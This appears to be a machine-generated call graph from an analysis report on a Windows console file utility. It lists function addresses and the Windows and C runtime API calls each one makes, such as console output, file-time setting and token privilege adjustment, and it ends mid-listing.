__EH_prolog 75577->75588 75579 d2afac 75580 cf2e04 2 API calls 75579->75580 75581 d2afbb 75580->75581 75582 cf2e04 2 API calls 75581->75582 75583 d2afca 75582->75583 75584 cf2e04 2 API calls 75583->75584 75585 d2afd9 75584->75585 75586 cf2e04 2 API calls 75585->75586 75587 d2afe8 75586->75587 75587->75564 75588->75579 75592 d25475 75593 cf2fec 3 API calls 75592->75593 75594 d254b4 75593->75594 75597 d2c911 75594->75597 75596 d254bb 75598 d2c926 GetTickCount 75597->75598 75599 d2c92f 75597->75599 75598->75599 75600 d2c96d 75599->75600 75603 d2cb64 75599->75603 75661 cf2ab1 strcmp 75599->75661 75600->75603 75642 d2c86a 75600->75642 75603->75596 75605 d2c9ce 75605->75603 75608 cf27bb 3 API calls 75605->75608 75606 d2c95b 75606->75600 75662 cf3542 wcscmp 75606->75662 75614 d2c9e2 75608->75614 75610 d2ca0a 75611 d2ca21 75610->75611 75612 cf286d 5 API calls 75610->75612 75613 d2cb10 75611->75613 75620 cf286d 5 API calls 75611->75620 75615 d2ca16 75612->75615 75650 d2cb74 75613->75650 75614->75610 75664 cf286d 75614->75664 75671 cf28fa malloc _CxxThrowException free memcpy _CxxThrowException 75615->75671 75623 d2ca40 75620->75623 75622 d2cb59 75683 d2cb92 malloc _CxxThrowException free 75622->75683 75626 cf2fec 3 API calls 75623->75626 75629 d2ca4e 75626->75629 75672 cf2033 75629->75672 75630 d2cb50 75633 cf27bb 3 API calls 75630->75633 75631 d2cb49 75682 cf1f91 fflush 75631->75682 75633->75622 75635 d2caf5 75681 cf28fa malloc _CxxThrowException free memcpy _CxxThrowException 75635->75681 75637 cf2fec 3 API calls 75640 d2ca6a 75637->75640 75640->75635 75640->75637 75641 cf2033 10 API calls 75640->75641 75679 cf3599 memmove 75640->75679 75680 cf3402 malloc _CxxThrowException free memmove _CxxThrowException 75640->75680 75641->75640 75643 d2c88c __aulldiv 75642->75643 75644 d2c8d3 strlen 75643->75644 75645 d2c900 75644->75645 75646 d2c8f1 75644->75646 75647 cf28a1 5 API calls 75645->75647 75646->75645 75649 cf286d 5 API calls 75646->75649 75648 d2c90c 75647->75648 75648->75605 75663 cf2ab1 strcmp 75648->75663 75649->75646 75651 d2cb1c 75650->75651 75652 d2cb7c strcmp 75650->75652 75651->75622 75653 d2c7d7 75651->75653 75652->75651 75654 d2c7ea 75653->75654 75655 d2c849 75653->75655 75656 d2c7fe fputs 75654->75656 75684 cf25cb malloc _CxxThrowException free _CxxThrowException ctype 75654->75684 75657 d2c85a fputs 75655->75657 75685 cf1f91 fflush 75655->75685 75656->75655 75657->75630 75657->75631 75661->75606 75662->75600 75663->75605 75686 cf1e9d 75664->75686 75667 cf28a1 75668 cf28b0 75667->75668 75691 cf267f 75668->75691 75670 cf28bf 75670->75610 75671->75611 75673 cf203b 75672->75673 75674 cf2045 75673->75674 75675 cf2054 75673->75675 75701 cf421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 75674->75701 75702 cf37ff 9 API calls 75675->75702 75678 cf2052 75678->75640 75679->75640 75680->75640 75681->75613 75682->75630 75683->75603 75684->75656 75685->75657 75687 cf1ead 75686->75687 75688 cf1ea8 75686->75688 75687->75667 75690 cf263c malloc _CxxThrowException free memcpy _CxxThrowException 75688->75690 75690->75687 75692 cf2693 75691->75692 75693 cf26c2 75691->75693 75694 cf26c8 _CxxThrowException 75692->75694 75695 cf26bc 75692->75695 75693->75670 75696 cf26dd 75694->75696 75700 cf2595 malloc _CxxThrowException free memcpy ctype 75695->75700 75698 cf1e0c ctype 2 API calls 75696->75698 75699 cf26ea 75698->75699 75699->75670 75700->75693 75701->75678 75702->75678 75703 d769f0 free 75704 d8ffb1 __setusermatherr 75705 d8ffbd 75704->75705 75710 d90068 _controlfp 75705->75710 75707 d8ffc2 _initterm __getmainargs _initterm __p___initenv 75708 d2c27c 75707->75708 75709 d9001d exit _XcptFilter 75708->75709 75710->75707 75711 d1cefb 75712 d1d0cc 75711->75712 75713 d1cf03 75711->75713 75713->75712 75758 d1cae9 VariantClear 75713->75758 75715 d1cf59 75715->75712 75759 d1cae9 VariantClear 75715->75759 75717 d1cf71 75717->75712 75760 d1cae9 VariantClear 75717->75760 75719 d1cf87 75719->75712 75761 d1cae9 VariantClear 75719->75761 75721 d1cf9d 75721->75712 75762 d1cae9 VariantClear 75721->75762 75723 d1cfb3 75723->75712 75763 d1cae9 VariantClear 75723->75763 75725 d1cfc9 75725->75712 75764 cf4504 malloc _CxxThrowException 75725->75764 75727 d1cfdc 75728 cf2e04 2 API calls 75727->75728 75730 d1cfe7 75728->75730 75729 d1d009 75731 d1d07b 75729->75731 75733 d1d080 75729->75733 75734 d1d030 75729->75734 75730->75729 75732 cf2f88 3 API calls 75730->75732 75772 cf1e40 free 75731->75772 75732->75729 75769 d17a0c CharUpperW 75733->75769 75737 cf2e04 2 API calls 75734->75737 75740 d1d038 75737->75740 75738 d1d0c4 75773 cf1e40 free 75738->75773 75739 d1d08b 75770 d0fdbc 4 API calls 2 library calls 75739->75770 75742 cf2e04 2 API calls 75740->75742 75744 d1d046 75742->75744 75765 d0fdbc 4 API calls 2 library calls 75744->75765 75745 d1d0a7 75747 cf2fec 3 API calls 75745->75747 75749 d1d0b3 75747->75749 75748 d1d057 75750 cf2fec 3 API calls 75748->75750 75771 cf1e40 free 75749->75771 75752 d1d063 75750->75752 75766 cf1e40 free 75752->75766 75754 d1d06b 75767 cf1e40 free 75754->75767 75756 d1d073 75768 cf1e40 free 75756->75768 75758->75715 75759->75717 75760->75719 75761->75721 75762->75723 75763->75725 75764->75727 75765->75748 75766->75754 75767->75756 75768->75731 75769->75739 75770->75745 75771->75731 75772->75738 75773->75712 75774 d2993d 75858 d2b5b1 75774->75858 75777 d29963 75864 d01f33 75777->75864 75780 d29975 75781 d299b7 GetStdHandle GetConsoleScreenBufferInfo 75780->75781 75782 d299ce 75780->75782 75781->75782 75783 cf1e0c ctype 2 API calls 75782->75783 75784 d299dc 75783->75784 75985 d17b48 75784->75985 75786 d29a29 76014 d2b96d _CxxThrowException 75786->76014 75788 d29a30 76015 d17018 8 API calls 2 library calls 75788->76015 75790 d29a7c 76016 d1ddb5 6 API calls 2 library calls 75790->76016 75792 d29a66 _CxxThrowException 75792->75790 75793 d29aa6 75794 d29aaa _CxxThrowException 75793->75794 75808 d29ac0 75793->75808 75794->75808 75795 d29a37 75795->75790 75795->75792 75796 d29b3a 76020 cf1fa0 fputc 75796->76020 75799 d29bfa _CxxThrowException 75855 d29be6 75799->75855 75800 d29b63 fputs 76021 cf1fa0 fputc 75800->76021 75803 d29b79 strlen strlen 75804 d29e25 75803->75804 75805 d29baa fputs fputc 75803->75805 76029 cf1fa0 fputc 75804->76029 75805->75855 75808->75796 75808->75799 76017 d17dd7 7 API calls 2 library calls 75808->76017 76018 d2c077 6 API calls 75808->76018 76019 cf1e40 free 75808->76019 75809 d29e2c fputs 76030 cf1fa0 fputc 75809->76030 75811 d29f0c 76035 cf1fa0 fputc 75811->76035 75814 d2b67d 12 API calls 75814->75855 75815 d29f13 fputs 76036 cf1fa0 fputc 75815->76036 75819 d29f9f 75820 d2ac3a 75819->75820 75822 d2ac35 75819->75822 76042 d2b96d _CxxThrowException 75820->76042 75821 cf2e04 2 API calls 75821->75855 76041 d2b988 33 API calls __aulldiv 75822->76041 75826 d2ac42 75832 d29f29 75832->75819 75846 d29f77 fputs 75832->75846 76037 d2b650 fputc fputs fputs fputc 75832->76037 76038 d2b5e9 fputc fputs 75832->76038 76039 d2bde4 fputc fputs 75832->76039 75835 d29d2a fputs 76026 cf21d8 fputs 75835->76026 75841 d29d5f fputs 75841->75855 75842 cf31e5 malloc _CxxThrowException free _CxxThrowException 75842->75855 75844 d29e42 75844->75811 75851 d29ee0 fputs 75844->75851 76031 d2b650 fputc fputs fputs fputc 75844->76031 76032 cf21d8 fputs 75844->76032 76033 d2bde4 fputc fputs 75844->76033 76040 cf1fa0 fputc 75846->76040 76034 cf1fa0 fputc 75851->76034 75855->75804 75855->75805 75855->75814 75855->75821 75855->75835 75855->75841 75855->75842 76022 cf21d8 fputs 75855->76022 76023 cf315e malloc _CxxThrowException free _CxxThrowException 75855->76023 76024 cf3221 malloc _CxxThrowException free _CxxThrowException 75855->76024 76025 cf1089 malloc _CxxThrowException free _CxxThrowException 75855->76025 76027 cf1fa0 fputc 75855->76027 76028 cf1e40 free 75855->76028 75859 d2994a 75858->75859 75860 d2b5bc fputs 75858->75860 75859->75777 76002 cf1fb3 75859->76002 76054 cf1fa0 fputc 75860->76054 75862 d2b5d5 75862->75859 75863 d2b5d9 fputs 75862->75863 75863->75859 75865 d01f6c 75864->75865 75866 d01f4f 75864->75866 76055 d029eb 75865->76055 76097 d11d73 5 API calls __EH_prolog 75866->76097 75869 d01f5e _CxxThrowException 75869->75865 75871 d01fa3 75873 d01fbc 75871->75873 75875 cf4fc0 5 API calls 75871->75875 75876 d01fda 75873->75876 75877 cf2fec 3 API calls 75873->75877 75874 d01f95 _CxxThrowException 75874->75871 75875->75873 75878 d02022 wcscmp 75876->75878 75887 d02036 75876->75887 75877->75876 75879 d020af 75878->75879 75878->75887 76099 d11d73 5 API calls __EH_prolog 75879->76099 75881 d020be _CxxThrowException 75881->75887 75882 d020a9 76100 d0393c 6 API calls 2 library calls 75882->76100 75884 d020f4 76101 d0393c 6 API calls 2 library calls 75884->76101 75886 d02108 75888 d02135 75886->75888 76102 d02e04 62 API calls 2 library calls 75886->76102 75887->75882 75891 d0219a 75887->75891 75896 d02159 75888->75896 76103 d02e04 62 API calls 2 library calls 75888->76103 76104 d11d73 5 API calls __EH_prolog 75891->76104 75893 d021a9 _CxxThrowException 75893->75896 75894 d0227f 76060 d02aa9 75894->76060 75895 d02245 75899 cf2fec 3 API calls 75895->75899 75896->75894 75896->75895 76105 d11d73 5 API calls __EH_prolog 75896->76105 75902 d0225c 75899->75902 75901 d02237 _CxxThrowException 75901->75895 75902->75894 76106 d11d73 5 API calls __EH_prolog 75902->76106 75903 d022d9 75904 d02302 75903->75904 75906 cf2fec 3 API calls 75903->75906 76078 cf4fc0 75904->76078 75905 cf2fec 3 API calls 75905->75903 75906->75904 75910 d02271 _CxxThrowException 75910->75894 75912 d02322 75913 d026c6 75912->75913 75919 d023a1 75912->75919 75914 d028ce 75913->75914 75916 d02700 75913->75916 76119 d11d73 5 API calls __EH_prolog 75913->76119 75915 d0293a 75914->75915 75929 d028d5 75914->75929 75920 d029a5 75915->75920 75921 d0293f 75915->75921 76120 d032ec 14 API calls 2 library calls 75916->76120 75927 d0247a wcscmp 75919->75927 75946 d0248e 75919->75946 75923 d029ae _CxxThrowException 75920->75923 75977 d0264d 75920->75977 76137 cf4eec 16 API calls 75921->76137 75922 d026f2 _CxxThrowException 75922->75916 75924 d02713 76121 d03a29 75924->76121 75926 d0294c 76138 cf4ea1 8 API calls 75926->76138 75932 d024cf wcscmp 75927->75932 75927->75946 75929->75977 76136 d11d73 5 API calls __EH_prolog 75929->76136 75936 d024ef wcscmp 75932->75936 75932->75946 75933 d02953 75938 cf4fc0 5 API calls 75933->75938 75937 d0250f 75936->75937 75936->75946 76110 d11d73 5 API calls __EH_prolog 75937->76110 75938->75977 75939 d02920 _CxxThrowException 75939->75977 75941 d0251e _CxxThrowException 75944 d0252c 75941->75944 75943 d027cf 75947 d02880 75943->75947 75952 d0281f 75943->75952 76132 d11d73 5 API calls __EH_prolog 75943->76132 75948 d02569 75944->75948 76111 d02e04 62 API calls 2 library calls 75944->76111 75945 cf2fec 3 API calls 75949 d027a9 75945->75949 75946->75944 76107 cf4eec 16 API calls 75946->76107 76108 cf4ea1 8 API calls 75946->76108 76109 d11d73 5 API calls __EH_prolog 75946->76109 75950 d0289b 75947->75950 75957 cf2fec 3 API calls 75947->75957 75954 d0258c 75948->75954 76112 d02e04 62 API calls 2 library calls 75948->76112 75949->75943 76131 cf3563 memmove 75949->76131 75950->75977 76135 d11d73 5 API calls __EH_prolog 75950->76135 75952->75947 75959 d02847 75952->75959 76133 d11d73 5 API calls __EH_prolog 75952->76133 75961 d025a4 75954->75961 76113 d02a61 malloc _CxxThrowException free _CxxThrowException memcpy 75954->76113 75955 d024c1 _CxxThrowException 75955->75932 75957->75950 75958 d02811 _CxxThrowException 75958->75952 75959->75947 76134 d11d73 5 API calls __EH_prolog 75959->76134 76114 cf4eec 16 API calls 75961->76114 75967 d025ad 76115 d11b07 49 API calls 75967->76115 75968 d028c0 _CxxThrowException 75968->75914 75969 d02839 _CxxThrowException 75969->75959 75972 d02872 _CxxThrowException 75972->75947 75973 d025b4 76116 cf4ea1 8 API calls 75973->76116 75975 d025bb 75976 cf2fec 3 API calls 75975->75976 75979 d025d6 75975->75979 75976->75979 75977->75780 75978 d0261f 75978->75977 75980 cf2fec 3 API calls 75978->75980 75979->75977 75979->75978 76117 d11d73 5 API calls __EH_prolog 75979->76117 75982 d0263f 75980->75982 76118 cf859e malloc _CxxThrowException free _CxxThrowException 75982->76118 75983 d02611 _CxxThrowException 75983->75978 75986 d17b52 __EH_prolog 75985->75986 76157 d17eec 75986->76157 75989 d17ca4 75989->75786 75990 cf2e04 malloc _CxxThrowException 75997 d17b63 75990->75997 75991 cf30ea malloc _CxxThrowException free 75991->75997 75993 cf1e40 free ctype 75993->75997 75995 d304d2 5 API calls 75995->75997 75996 d012a5 5 API calls 75996->75997 75997->75989 75997->75990 75997->75991 75997->75993 75997->75995 75997->75996 75999 cf429a 3 API calls 75997->75999 76000 d17c61 memcpy 75997->76000 76001 d17193 free 75997->76001 76162 d170ea 75997->76162 76165 d17a40 75997->76165 76183 d17cc3 6 API calls 75997->76183 76184 d174eb malloc _CxxThrowException memcpy __EH_prolog ctype 75997->76184 75999->75997 76000->75997 76001->75997 76003 cf1fbd __EH_prolog 76002->76003 76004 cf26dd 2 API calls 76003->76004 76005 cf1fcb 76004->76005 76006 cf2e47 2 API calls 76005->76006 76007 cf1fda 76006->76007 76191 cf2010 76007->76191 76009 cf1fed 76194 cf1e40 free 76009->76194 76011 cf1ff5 76195 cf1e40 free 76011->76195 76013 cf1ffd 76013->75777 76014->75788 76015->75795 76016->75793 76017->75808 76018->75808 76019->75808 76020->75800 76021->75803 76022->75855 76023->75855 76024->75855 76025->75855 76026->75855 76027->75855 76028->75855 76029->75809 76030->75844 76031->75844 76032->75844 76033->75844 76034->75844 76035->75815 76036->75832 76037->75832 76038->75832 76039->75832 76040->75832 76041->75820 76042->75826 76054->75862 76056 cf2f1c 2 API calls 76055->76056 76057 d029fe 76056->76057 76139 cf1e40 free 76057->76139 76059 d01f7e 76059->75871 76098 d11d73 5 API calls __EH_prolog 76059->76098 76062 d02ab3 __EH_prolog 76060->76062 76061 d02b0f 76064 d022ad 76061->76064 76068 d02bc6 76061->76068 76075 d02b9f 76061->76075 76146 d02cb4 48 API calls 2 library calls 76061->76146 76147 d02bf5 8 API calls __EH_prolog 76061->76147 76148 d02a61 malloc _CxxThrowException free _CxxThrowException memcpy 76061->76148 76062->76061 76140 cf2e8a 76062->76140 76064->75903 76064->75905 76067 d02b04 76145 cf1e40 free 76067->76145 76150 d11d73 5 API calls __EH_prolog 76068->76150 76071 d02bd6 _CxxThrowException 76071->76064 76075->76064 76149 d11d73 5 API calls __EH_prolog 76075->76149 76077 d02bb8 _CxxThrowException 76077->76068 76079 cf4fce 76078->76079 76080 cf4fd2 76078->76080 76088 d0384c 76079->76088 76081 d17ebb free 76080->76081 76082 cf4fd9 76081->76082 76083 cf5006 76082->76083 76084 cf4ffe 76082->76084 76085 cf4fe9 _CxxThrowException 76082->76085 76083->76079 76152 cf1524 malloc _CxxThrowException __EH_prolog ctype 76083->76152 76151 d30551 malloc _CxxThrowException free memcpy ctype 76084->76151 76085->76084 76089 d03856 __EH_prolog 76088->76089 76090 cf2e04 malloc _CxxThrowException 76089->76090 76091 cf2fec 3 API calls 76089->76091 76092 cf2f88 3 API calls 76089->76092 76093 d304d2 5 API calls 76089->76093 76095 cf1e40 free ctype 76089->76095 76096 d03917 76089->76096 76153 d03b76 malloc _CxxThrowException __EH_prolog ctype 76089->76153 76090->76089 76091->76089 76092->76089 76093->76089 76095->76089 76096->75912 76097->75869 76098->75874 76099->75881 76100->75884 76101->75886 76102->75888 76103->75896 76104->75893 76105->75901 76106->75910 76107->75946 76108->75946 76109->75955 76110->75941 76111->75948 76112->75954 76113->75961 76114->75967 76115->75973 76116->75975 76117->75983 76118->75977 76119->75922 76120->75924 76122 d02722 76121->76122 76123 d03a3b 76121->76123 76122->75943 76122->75945 76154 d03bd9 free ctype 76123->76154 76125 d03a42 76126 d03a6f 76125->76126 76127 d03a52 _CxxThrowException 76125->76127 76128 d03a67 76125->76128 76126->76122 76156 d03b76 malloc _CxxThrowException __EH_prolog ctype 76126->76156 76127->76128 76155 d30551 malloc _CxxThrowException free memcpy ctype 76128->76155 76131->75943 76132->75958 76133->75969 76134->75972 76135->75968 76136->75939 76137->75926 76138->75933 76139->76059 76141 cf2ea0 76140->76141 76142 cf2ba6 2 API calls 76141->76142 76143 cf2eaf 76142->76143 76144 d02a61 malloc _CxxThrowException free _CxxThrowException memcpy 76143->76144 76144->76067 76145->76061 76146->76061 76147->76061 76148->76061 76149->76077 76150->76071 76151->76083 76152->76083 76153->76089 76154->76125 76155->76126 76156->76126 76158 d17f14 76157->76158 76160 d17ef7 76157->76160 76158->75997 76159 d17193 free 76159->76160 76160->76158 76160->76159 76185 cf1e40 free 76160->76185 76163 cf2e04 2 API calls 76162->76163 76164 d17103 76163->76164 76164->75997 76166 d17a4a __EH_prolog 76165->76166 76186 cf361b 6 API calls 2 library calls 76166->76186 76168 d17a78 76187 cf361b 6 API calls 2 library calls 76168->76187 76170 d17a83 76171 d17b20 76170->76171 76175 cf2e04 malloc _CxxThrowException 76170->76175 76177 cf2fec 3 API calls 76170->76177 76178 d304d2 5 API calls 76170->76178 76179 cf2fec 3 API calls 76170->76179 76182 cf1e40 free ctype 76170->76182 76188 d17955 malloc _CxxThrowException __EH_prolog ctype 76170->76188 76189 d22db9 free ctype 76171->76189 76173 d17b2b 76190 d22db9 free ctype 76173->76190 76175->76170 76176 d17b37 76176->75997 76177->76170 76178->76170 76180 d17aca wcscmp 76179->76180 76180->76170 76182->76170 76183->75997 76184->75997 76185->76160 76186->76168 76187->76170 76188->76170 76189->76173 76190->76176 76192 cf2033 10 API calls 76191->76192 76193 cf2022 fputs 76192->76193 76193->76009 76194->76011 76195->76013 76198 cf7b20 76201 cf7ab2 76198->76201 76202 cf7ac5 76201->76202 76203 cf759a 12 API calls 76202->76203 76204 cf7ade 76203->76204 76205 cf7b03 76204->76205 76206 cf7aeb SetFileTime 76204->76206 76209 cf7919 76205->76209 76206->76205 76210 cf7aac 76209->76210 76211 cf793c 76209->76211 76211->76210 76212 cf7945 DeviceIoControl 76211->76212 76213 cf79e6 76212->76213 76216 cf7969 76212->76216 76214 cf79ef DeviceIoControl 76213->76214 76218 cf7a14 76213->76218 76215 cf7a22 DeviceIoControl 76214->76215 76214->76218 76217 cf7a44 DeviceIoControl 76215->76217 76215->76218 76216->76213 76220 cf79a7 76216->76220 76217->76218 76218->76210 76226 cf780d 8 API calls ctype 76218->76226 76225 cf9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 76220->76225 76221 cf7aa5 76223 cf77de 5 API calls 76221->76223 76223->76210 76224 cf79d0 76224->76213 76225->76224 76226->76221 76227 cfc3bd 76228 cfc3ca 76227->76228 76229 cfc3db 76227->76229 76228->76229 76231 cf1e40 free 76228->76231 76231->76229 76232 d2c2e6 76233 d2c52f 76232->76233 76236 d2544f SetConsoleCtrlHandler 76233->76236 76235 d2c53b 76236->76235 76237 d76ba3 VirtualFree 76238 d3bf67 76239 d3bf74 76238->76239 76240 d3bf85 76238->76240 76239->76240 76244 d3bf8c 76239->76244 76245 d3bf96 __EH_prolog 76244->76245 76261 d3d144 76245->76261 76249 d3bfd0 76268 cf1e40 free 76249->76268 76251 d3bfdb 76269 cf1e40 free 76251->76269 76253 d3bfe6 76270 d3c072 free ctype 76253->76270 76255 d3bff4 76271 d0aafa free VariantClear ctype 76255->76271 76257 d3c023 76272 d173d2 free VariantClear __EH_prolog ctype 76257->76272 76259 d3bf7f 76260 cf1e40 free 76259->76260 76260->76240 76262 d3d14e __EH_prolog 76261->76262 76263 d3d1b7 free 76262->76263 76264 d3d180 76263->76264 76273 d38e04 memset 76264->76273 76266 d3bfc5 76267 cf1e40 free 76266->76267 76267->76249 76268->76251 76269->76253 76270->76255 76271->76257 76272->76259 76273->76266 76274 d87da0 WaitForSingleObject 76275 d87dbb GetLastError 76274->76275 76276 d87dc1 76274->76276 76275->76276 76277 d87ddf 76276->76277 76278 d87dce CloseHandle 76276->76278 76278->76277 76279 d87dd9 GetLastError 76278->76279 76279->76277 76280 d01368 76282 d0136d 76280->76282 76283 d0138c 76282->76283 76286 d87d80 WaitForSingleObject 76282->76286 76289 d2f745 76282->76289 76293 d87ea0 SetEvent GetLastError 76282->76293 76287 d87d98 76286->76287 76288 d87d8e GetLastError 76286->76288 76287->76282 76288->76287 76290 d2f74f __EH_prolog 76289->76290 76294 d2f784 76290->76294 76292 d2f765 76292->76282 76293->76282 76295 d2f78e __EH_prolog 76294->76295 76296 d012d4 4 API calls 76295->76296 76297 d2f7c7 76296->76297 76298 d012d4 4 API calls 76297->76298 76299 d2f7d4 76298->76299 76300 d2f871 76299->76300 76303 d76b23 VirtualAlloc 76299->76303 76304 cfc4d6 76299->76304 76300->76292 76303->76300 76308 cfc4e9 76304->76308 76305 cfc6f3 76305->76300 76306 d0111c 10 API calls 76306->76308 76307 d011b4 107 API calls 76307->76308 76308->76305 76308->76306 76308->76307 76309 cfc695 memmove 76308->76309 76309->76308 76310 d2a42c 76311 d2a435 fputs 76310->76311 76312 d2a449 76310->76312 76468 cf1fa0 fputc 76311->76468 76469 d2545d 76312->76469 76316 cf2e04 2 API calls 76317 d2a4a1 76316->76317 76473 d11858 76317->76473 76319 d2a4c9 76535 cf1e40 free 76319->76535 76321 d2a4d8 76322 d2a4ee 76321->76322 76323 d2c7d7 ctype 6 API calls 76321->76323 76324 d2a50e 76322->76324 76536 d257fb 76322->76536 76323->76322 76546 d2c73e 76324->76546 76328 d2aae5 76701 d22db9 free ctype 76328->76701 76330 cf1e0c ctype 2 API calls 76333 d2a53a 76330->76333 76331 d2ac17 76702 d22db9 free ctype 76331->76702 76335 d2a54d 76333->76335 76672 d2b0fa malloc _CxxThrowException __EH_prolog 76333->76672 76334 d2ac23 76336 d2ac3a 76334->76336 76338 d2ac35 76334->76338 76342 cf2fec 3 API calls 76335->76342 76704 d2b96d _CxxThrowException 76336->76704 76703 d2b988 33 API calls __aulldiv 76338->76703 76341 d2ac42 76705 cf1e40 free 76341->76705 76347 d2a586 76342->76347 76344 d2ac4d 76345 d13247 free 76344->76345 76346 d2ac5d 76345->76346 76706 cf1e40 free 76346->76706 76564 d2ad06 76347->76564 76351 d2ac7d 76707 cf11c2 free __EH_prolog ctype 76351->76707 76355 d2ac89 76708 d2be0c free __EH_prolog ctype 76355->76708 76356 d03a29 5 API calls 76358 d2a62e 76356->76358 76360 cf2e04 2 API calls 76358->76360 76359 d2ac98 76709 d22db9 free ctype 76359->76709 76362 d2a636 76360->76362 76572 d14345 76362->76572 76363 d2aca4 76468->76312 76470 d25473 76469->76470 76471 d25466 76469->76471 76470->76316 76710 cf275e malloc _CxxThrowException free ctype 76471->76710 76474 d11862 __EH_prolog 76473->76474 76711 d1021a 76474->76711 76479 d118b9 76725 d11aa5 free __EH_prolog ctype 76479->76725 76480 d11935 76730 d11aa5 free __EH_prolog ctype 76480->76730 76483 d118c7 76726 d22db9 free ctype 76483->76726 76484 d11944 76490 d11966 76484->76490 76731 d11d73 5 API calls __EH_prolog 76484->76731 76488 d304d2 5 API calls 76495 d118db 76488->76495 76489 d11958 _CxxThrowException 76489->76490 76491 d119be 76490->76491 76494 cf2e04 2 API calls 76490->76494 76499 cf631f 9 API calls 76490->76499 76502 d304d2 5 API calls 76490->76502 76732 cf1524 malloc _CxxThrowException __EH_prolog ctype 76490->76732 76733 cf1e40 free 76490->76733 76734 d1f1f1 malloc _CxxThrowException free _CxxThrowException 76491->76734 76494->76490 76495->76480 76495->76488 76727 d10144 malloc _CxxThrowException free _CxxThrowException 76495->76727 76728 cf1524 malloc _CxxThrowException __EH_prolog ctype 76495->76728 76729 cf1e40 free 76495->76729 76496 d119d6 76498 d17ebb free 76496->76498 76500 d119e1 76498->76500 76499->76490 76501 d012d4 4 API calls 76500->76501 76503 d119ea 76501->76503 76502->76490 76504 d17ebb free 76503->76504 76506 d119f7 76504->76506 76508 d012d4 4 API calls 76506->76508 76515 d119ff 76508->76515 76509 d11a4f 76736 cf1e40 free 76509->76736 76511 cf1524 malloc _CxxThrowException 76511->76515 76512 d11a57 76737 d22db9 free ctype 76512->76737 76514 d11a64 76738 d22db9 free ctype 76514->76738 76515->76509 76515->76511 76519 d11a83 76515->76519 76735 cf42e3 CharUpperW 76515->76735 76518 d118d3 76518->76319 76739 d11d73 5 API calls __EH_prolog 76519->76739 76521 d11a97 _CxxThrowException 76522 d11aa5 __EH_prolog 76521->76522 76740 cf1e40 free 76522->76740 76524 d11ac8 76741 d102e8 free ctype 76524->76741 76526 d11ad1 76742 d11eab free __EH_prolog ctype 76526->76742 76528 d11add 76743 cf1e40 free 76528->76743 76530 d11ae5 76744 cf1e40 free 76530->76744 76532 d11aed 76745 d22db9 free ctype 76532->76745 76534 d11afa 76534->76319 76535->76321 76537 d25805 __EH_prolog 76536->76537 76538 cf26dd 2 API calls 76537->76538 76545 d25847 76537->76545 76539 d25819 76538->76539 76873 d25678 76539->76873 76543 d2583f 76890 cf1e40 free 76543->76890 76545->76324 76547 d2c748 __EH_prolog 76546->76547 76548 d2c7d7 ctype 6 API calls 76547->76548 76549 d2c75d 76548->76549 76907 cf1e40 free 76549->76907 76551 d2c768 76552 d12c0b ctype free 76551->76552 76553 d2c775 76552->76553 76908 cf1e40 free 76553->76908 76555 d2c77d 76909 cf1e40 free 76555->76909 76557 d2c785 76910 cf1e40 free 76557->76910 76559 d2c78d 76911 cf1e40 free 76559->76911 76561 d2c795 76562 d12c0b ctype free 76561->76562 76563 d2a51d 76562->76563 76563->76328 76563->76330 76565 d2ad29 2 API calls 76564->76565 76566 d2a5d8 76565->76566 76567 d2bf3e 76566->76567 76568 cf2fec 3 API calls 76567->76568 76569 d2bf85 76568->76569 76570 cf2fec 3 API calls 76569->76570 76571 d2a5ee 76570->76571 76571->76356 76573 d1434f __EH_prolog 76572->76573 76574 cf2e04 2 API calls 76573->76574 76575 d1436d 76574->76575 76672->76335 76701->76331 76702->76334 76703->76336 76704->76341 76705->76344 76706->76351 76707->76355 76708->76359 76709->76363 76710->76470 76712 d10224 __EH_prolog 76711->76712 76746 d03d66 76712->76746 76715 d1062e 76723 d10638 __EH_prolog 76715->76723 76716 d106de 76833 d1019a malloc _CxxThrowException free memcpy 76716->76833 76718 d106e6 76834 d11453 26 API calls 2 library calls 76718->76834 76720 d106ee 76720->76479 76720->76495 76721 d101bc malloc _CxxThrowException free _CxxThrowException memcpy 76721->76723 76723->76716 76723->76720 76723->76721 76762 d10703 76723->76762 76832 d22db9 free ctype 76723->76832 76725->76483 76726->76518 76727->76495 76728->76495 76729->76495 76730->76484 76731->76489 76732->76490 76733->76490 76734->76496 76735->76515 76736->76512 76737->76514 76738->76518 76739->76521 76740->76524 76741->76526 76742->76528 76743->76530 76744->76532 76745->76534 76757 d8fb10 76746->76757 76748 d03d70 GetCurrentProcess 76758 d03e04 76748->76758 76750 d03d8d OpenProcessToken 76751 d03de3 76750->76751 76752 d03d9e LookupPrivilegeValueW 76750->76752 76754 d03e04 CloseHandle 76751->76754 76752->76751 76753 d03dc0 AdjustTokenPrivileges 76752->76753 76753->76751 76755 d03dd5 GetLastError 76753->76755 76756 d03def 76754->76756 76755->76751 76756->76715 76757->76748 76759 d03e11 CloseHandle 76758->76759 76760 d03e0d 76758->76760 76761 d03e21 76759->76761 76760->76750 76761->76750 76787 d1070d __EH_prolog 76762->76787 76763 d10e1d 76870 d10416 18 API calls 2 library calls 76763->76870 76765 d10ea6 76872 d3ec78 free ctype 76765->76872 76766 d10d11 76864 cf7496 7 API calls 2 library calls 76766->76864 76769 d10c13 76861 cf1e40 free 76769->76861 76771 cf2da9 2 API calls 76771->76787 76773 d10de0 76866 d22db9 free ctype 76773->76866 76774 cf2da9 2 API calls 76795 d10ab5 76774->76795 76775 d10e47 76775->76765 76871 d1117d 68 API calls 2 library calls 76775->76871 76776 d10c83 76776->76763 76776->76766 76777 d10b40 76777->76723 76778 cf2f1c 2 API calls 76793 d10d29 76778->76793 76781 cf2e04 2 API calls 76781->76787 76782 cf2e04 2 API calls 76782->76795 76785 d10e02 76869 d22db9 free ctype 76785->76869 76787->76771 76787->76776 76787->76777 76787->76781 76790 cf2fec 3 API calls 76787->76790 76787->76795 76807 d304d2 malloc _CxxThrowException free _CxxThrowException memcpy 76787->76807 76813 cf1524 malloc _CxxThrowException 76787->76813 76826 d10b48 76787->76826 76828 d10b26 76787->76828 76830 cf1e40 free ctype 76787->76830 76831 d22db9 free ctype 76787->76831 76835 cf2f4a malloc _CxxThrowException free ctype 76787->76835 76836 cf1089 malloc _CxxThrowException free _CxxThrowException 76787->76836 76837 d113eb 5 API calls 2 library calls 76787->76837 76838 d1050b 76787->76838 76843 d10021 GetLastError 76787->76843 76844 cf49bd 9 API calls 2 library calls 76787->76844 76845 d10306 12 API calls 76787->76845 76846 d0ff00 5 API calls 2 library calls 76787->76846 76847 d1057d 16 API calls 2 library calls 76787->76847 76848 d10f8e 24 API calls 